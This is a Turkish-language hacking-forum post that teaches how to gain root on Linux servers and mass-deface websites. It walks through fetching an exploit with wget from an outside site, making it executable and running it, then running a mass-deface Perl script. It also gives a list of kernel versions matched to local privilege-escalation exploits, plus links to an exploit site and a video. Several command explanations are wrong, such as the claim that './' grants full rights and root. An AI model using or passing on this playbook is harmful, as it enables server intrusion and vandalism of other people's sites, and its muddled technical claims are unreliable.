LiNuX Server ! RooT Hakkinda Herse ;)

Başlıca Komutlarımız;

wget : Wget Komutu, Server'a dosya cekmek için kullanılır genelde exploit cekerken bu komuttan yararlanırız. Örneğin, Wget http://unkn0wn.com/exp/prctl2.c gibi

Chmod : chmod, server'a upload ettigmiz dosyamızın chmod ayarlarını 777 yapmamızı saglar yani herkes tarafından kullanılabilir anlamına gelir. örn; chmod 777 prctl2.c

./ : ./ Komutu dosyaya full yetki werme komutudur bizim root olmamızı sağlar. örn; ./prctl2.c

perl : perl komutu ise calıstrma komutudur. server da ki bir dosyayı calıstırmak için kullanılır. Örn; perl mass.pl /tmp/index.html ...

cd : cd komutu ise dosyalar arası geçişi sağlar. Örn; cd /tmp tmp dosyasına geçmemizi sağlar.

uname -a : linux kernel versionunu göstermeyi sağlar.

pwd : hangi dizinde oldugumuzu göstermeyi sağlar.

ls : bulundugumuz dizindeki dosyaları göstermeyi sağlar.

rm -f : rm -f komutu ise istedgimiz dosyayı silmemize yarar. Örn ; rm -f index.html index.html dosyasını siler (perm varsa)


Şimdi bununa İlgli Videomuzu İzleyelim ;

http://dosyam.net/?id=r3sjj0

Şifre : starhack.org

Not : arkadaslar server da mass.pl yasaklı oldugu için mass deface atamadım ama root olamaya kadar gösterdim. root olduktan sonra yapmanız gereken , mass.pl explotini upload edip, perl mass.pl /tmp/index.html yapmanız ... tabi bundan önce /tmp dizinine inin ve oraya indexinizi atın...


Exp Listesi


2.4.17
newlocal
kmod


2.4.18
brk
newlocal
kmod
km.2


2.4.19
brk
newlocal
kmod
km.2


2.4.20
ptrace
kmod
km.2
brk


2.4.21
km.2
brk
ptrace


2.4.22
km.2
brk
ptrace


2.4.23
mremap_pte


2.4.24
mremap_pte
Uselib24


2.4.27
Uselib24


2.6.2
mremap_pte
krad


2.6.5 - 2.6.10
krad krad2

http://unkn0wns.com/exp Sitesinden Exploitleri Bulabilrsiniz..